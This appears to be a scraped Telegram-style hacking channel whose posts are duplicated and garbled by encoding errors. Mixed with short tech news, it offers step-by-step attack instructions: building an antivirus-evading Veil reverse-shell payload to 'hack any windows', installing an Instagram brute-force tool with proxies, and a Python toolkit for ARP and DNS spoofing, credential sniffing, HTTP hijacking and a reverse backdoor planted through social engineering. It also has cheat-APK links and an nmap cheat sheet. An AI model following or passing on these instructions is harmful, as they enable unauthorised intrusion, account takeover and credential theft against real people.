Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack any windows from any linux :
1) Veil can be installed by following command :-
Open Terminal and go inside opt directory (which is meant for installing optional packages) by running following command.
cd /opt/
2) Now, run this command to install Veil and all its related dependencies. You can also check out their github for more info.
git clone https://github.com/Veil-Framework/Veil.git
3) cd Veil/config/
Note :- If you are not root use sudo like shown below else if youβre root, remove sudo from below command.
4) sudo ./setup.sh βforce βsilent
It will take sometime depending upon internet speed. It will install as well as its dependencies like Wine and other gcc Mingw packages.
5) Once its done installing and everything is completed, close the terminal and open a new one or you can continue within the same terminal too. Now navigate to Veil directory by running following command :-
cd /opt/Veil/
6) Now to run Veil run the following command
Note :- If you are not root use sudo like shown below else if youβre root, remove sudo from below command.
sudo ./Veil.py
7) If you get something like shown below congratulations you are ready to move to the next section of this post and definitely you are going to hack windows.
To use this payload type following command :- use 15 and hit enter.
8) Now set the following options for generating the payload
set LHOST Your_IP_Address
9) set LPORT 8080
10) Now to bypass all anitivirus we will set some optional parameters too
set PROCESSORS 1
set SLEEP 6
11) hack veil values
12) Now we will generate our payload by running this command:-
generate
13) Then it will ask you to give some name to the file. You can name it anything you want. I named it to rev_https_8080.
hack generated
14) If you get output something like shown below, congratulations your payload is generated.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack any windows from any linux :
1) Veil can be installed by following command :-
Open Terminal and go inside opt directory (which is meant for installing optional packages) by running following command.
cd /opt/
2) Now, run this command to install Veil and all its related dependencies. You can also check out their github for more info.
git clone https://github.com/Veil-Framework/Veil.git
3) cd Veil/config/
Note :- If you are not root use sudo like shown below else if youβre root, remove sudo from below command.
4) sudo ./setup.sh βforce βsilent
It will take sometime depending upon internet speed. It will install as well as its dependencies like Wine and other gcc Mingw packages.
5) Once its done installing and everything is completed, close the terminal and open a new one or you can continue within the same terminal too. Now navigate to Veil directory by running following command :-
cd /opt/Veil/
6) Now to run Veil run the following command
Note :- If you are not root use sudo like shown below else if youβre root, remove sudo from below command.
sudo ./Veil.py
7) If you get something like shown below congratulations you are ready to move to the next section of this post and definitely you are going to hack windows.
To use this payload type following command :- use 15 and hit enter.
8) Now set the following options for generating the payload
set LHOST Your_IP_Address
9) set LPORT 8080
10) Now to bypass all anitivirus we will set some optional parameters too
set PROCESSORS 1
set SLEEP 6
11) hack veil values
12) Now we will generate our payload by running this command:-
generate
13) Then it will ask you to give some name to the file. You can name it anything you want. I named it to rev_https_8080.
hack generated
14) If you get output something like shown below, congratulations your payload is generated.
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - Veil-Framework/Veil: Veil 3.1.X (Check version info in Veil at runtime)
Veil 3.1.X (Check version info in Veil at runtime) - Veil-Framework/Veil
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦INSTA BRUTE UPDATED THIS MONTH :
Suggested to use proxies from https://pastebin.com/PU95YtCQ
open terminal
$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/evildevill/instahack
$ ls
$ cd instahack
$ ls
$ bash setup
$ bash instahack.sh
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦INSTA BRUTE UPDATED THIS MONTH :
Suggested to use proxies from https://pastebin.com/PU95YtCQ
open terminal
$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/evildevill/instahack
$ ls
$ cd instahack
$ ls
$ bash setup
$ bash instahack.sh
β β β Uππ»βΊπ«Δπ¬πβ β β β
Pastebin
DETAILED PROXIES LIST - Pastebin.com
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
Forwarded from UNDERCODE NEWS
An Anonymous Turkish hackers group crashed the ECHR website asking for DemirtaΕ's release.
#CyberAttacks
#CyberAttacks
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK YOUR ANDROID GAMES :
https://xmodgames.download/
https://hackerbot.net/software/444-hackerbot-download
https://www.cheatengine.org/downloads.php
https://sbgamehacker.download/apk/
https://creehack.net/
https://gameguardian.net/download
https://gamecihworld.puzl.com/
https://www.luckypatchers.com/lucky-patcher-6-0-7-apk/
http://leoplaycard.info/
https://gamekiller.co/
https://latestmodapks.com/download-freedom-apk-latest/
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK YOUR ANDROID GAMES :
https://xmodgames.download/
https://hackerbot.net/software/444-hackerbot-download
https://www.cheatengine.org/downloads.php
https://sbgamehacker.download/apk/
https://creehack.net/
https://gameguardian.net/download
https://gamecihworld.puzl.com/
https://www.luckypatchers.com/lucky-patcher-6-0-7-apk/
http://leoplaycard.info/
https://gamekiller.co/
https://latestmodapks.com/download-freedom-apk-latest/
β β β Uππ»βΊπ«Δπ¬πβ β β β
Techylist
Xmodgames - Download Xmod Apk For Android (Official)
People have been playing games like Clash of Clans, Minecraft, Clash Royale, Asphalt 8, Mortal Combat, etc. for such a long time that, most of them become dull. This is probably because the game is small or it is very hard after a certain level. So in suchβ¦
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Nmap Basic :
Target specification
-iL input from list
-iR input from random
Host probe
-sL scan by list
-sP scan by Ping
-P0 no ping
-PS tcp syn ping
-PA tcp ack ping
-PU udp ping
-PE; -PP, -PM
-PR arp ping
-n no domain name resolution
-R do reverse domain name resolution
Port Scan
-sS tcp syn scan
-sT tcp connect() scan
-sU udp scan
-sN set flag to null
-sF set flag FIN
-sX set all flags
-sA tcp ack
-sW tcp window
-sM tcp maimon
--scanflags URGSYNACKFINRST
-sI zombie scan
-sO ip protocol scan
-b ftp bounce scan
Port specification
-p <ports>
-F fast scan
Service probe
-sV scan service version
-A : -O + -sV , operate system probe and service version probe
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Nmap Basic :
Target specification
-iL input from list
-iR input from random
Host probe
-sL scan by list
-sP scan by Ping
-P0 no ping
-PS tcp syn ping
-PA tcp ack ping
-PU udp ping
-PE; -PP, -PM
-PR arp ping
-n no domain name resolution
-R do reverse domain name resolution
Port Scan
-sS tcp syn scan
-sT tcp connect() scan
-sU udp scan
-sN set flag to null
-sF set flag FIN
-sX set all flags
-sA tcp ack
-sW tcp window
-sM tcp maimon
--scanflags URGSYNACKFINRST
-sI zombie scan
-sO ip protocol scan
-b ftp bounce scan
Port specification
-p <ports>
-F fast scan
Service probe
-sV scan service version
-A : -O + -sV , operate system probe and service version probe
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Sony is planning to raise PS5 inventory, TSMC ASE is preparing more funding for capacity.
#Technologies
#Technologies
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
FULL NETWORK HACKING LIKE A PRO :
DOWNLOAD :https://github.com/billyshin/Python_Hacking
1) Programs and Tools written in Python that are useful in hacking in Kali Linux.
Required: Kali Linux, Python2, scapy package, netfilterqueue
pip install scapy
pip install scapy-http
pip install netfilterqueue
Contents:
2) mac_changer.py - A program that is used to change the MAC Address to ensure anonymity.
Usage: python mac_changer.py -i [Interface] -m [new MAC Address]
network_scanner.py - A program that uses target IP Address to get the target MAC Address under the same network.
Usage: python network_scanner.py -t [Taget IP Address]
3) arp_spoof.py - A program that functions exactly the same as arpspoof command in Kali Linux. It takes target ip address and gateway ip address as command line arguments.
Usage: python arp_spoof.py -t [Target IP Address] -g [Gateway]
packet_sniffer.py - A program that acts as MITM (Man In The Middle) to sniff/capture data through http layer such as url, username, password, etc. It must run with arp_spoof.py simultaneously.
Usage: python arp_spoof.py -t [Target IP Address] -g [Gateway]
python packet_sniffer.py -i [Interface]
4) dns_spoof.py - A program that acts as MITM (Man In The Middle) to intercept packets and store them in netfilterqueue and redirect target device to a certain IP Address.
Usage: python dns_spoof.py -i [IP Address]
file_interceptor.py - A program that hijacks target's HTTP request and modifies HTTP status code as well as HTTP response in order to redirect to user specified url.
Usage: iptables -I FORWARD -j NFQUEUE --queue-num 0
python arp_spoof.py -t [Target IP Address] -g [Gateway]
python file_interceptor.py -r [Redirect URL]
5) download.py - A program that download a file from input URL and save it to input destination location.
Usage: python download.py -u [URL] -d [Destination loaction]
reverse_backdoor.py - A backdoor program that allows hacker to execute simple commands on target device using reversed TCP. Need to change ip_address to your current IP Address in main code. It must be run in the target device locally, and thus social engineering or any other MITM attack should be used. It works in all environment that supports Python. listener.py only works when reverse_backdoor.py is running locally in target device.
6) listener.py - A socket program that allows us to listen from the reverser_backdoor.py program.
Usage: reverse_backdoor.py is running in target device
python listener.py -i [IP Address]
β β β Uππ»βΊπ«Δπ¬πβ β β β
FULL NETWORK HACKING LIKE A PRO :
DOWNLOAD :https://github.com/billyshin/Python_Hacking
1) Programs and Tools written in Python that are useful in hacking in Kali Linux.
Required: Kali Linux, Python2, scapy package, netfilterqueue
pip install scapy
pip install scapy-http
pip install netfilterqueue
Contents:
2) mac_changer.py - A program that is used to change the MAC Address to ensure anonymity.
Usage: python mac_changer.py -i [Interface] -m [new MAC Address]
network_scanner.py - A program that uses target IP Address to get the target MAC Address under the same network.
Usage: python network_scanner.py -t [Taget IP Address]
3) arp_spoof.py - A program that functions exactly the same as arpspoof command in Kali Linux. It takes target ip address and gateway ip address as command line arguments.
Usage: python arp_spoof.py -t [Target IP Address] -g [Gateway]
packet_sniffer.py - A program that acts as MITM (Man In The Middle) to sniff/capture data through http layer such as url, username, password, etc. It must run with arp_spoof.py simultaneously.
Usage: python arp_spoof.py -t [Target IP Address] -g [Gateway]
python packet_sniffer.py -i [Interface]
4) dns_spoof.py - A program that acts as MITM (Man In The Middle) to intercept packets and store them in netfilterqueue and redirect target device to a certain IP Address.
Usage: python dns_spoof.py -i [IP Address]
file_interceptor.py - A program that hijacks target's HTTP request and modifies HTTP status code as well as HTTP response in order to redirect to user specified url.
Usage: iptables -I FORWARD -j NFQUEUE --queue-num 0
python arp_spoof.py -t [Target IP Address] -g [Gateway]
python file_interceptor.py -r [Redirect URL]
5) download.py - A program that download a file from input URL and save it to input destination location.
Usage: python download.py -u [URL] -d [Destination loaction]
reverse_backdoor.py - A backdoor program that allows hacker to execute simple commands on target device using reversed TCP. Need to change ip_address to your current IP Address in main code. It must be run in the target device locally, and thus social engineering or any other MITM attack should be used. It works in all environment that supports Python. listener.py only works when reverse_backdoor.py is running locally in target device.
6) listener.py - A socket program that allows us to listen from the reverser_backdoor.py program.
Usage: reverse_backdoor.py is running in target device
python listener.py -i [IP Address]
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - billyshin/Python_Hacking: Network hacking tools written in Python
Network hacking tools written in Python. Contribute to billyshin/Python_Hacking development by creating an account on GitHub.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Probe Digital releases a long-distance IP zoom camera solution with high-magnification resolution.
#Technologies
#Technologies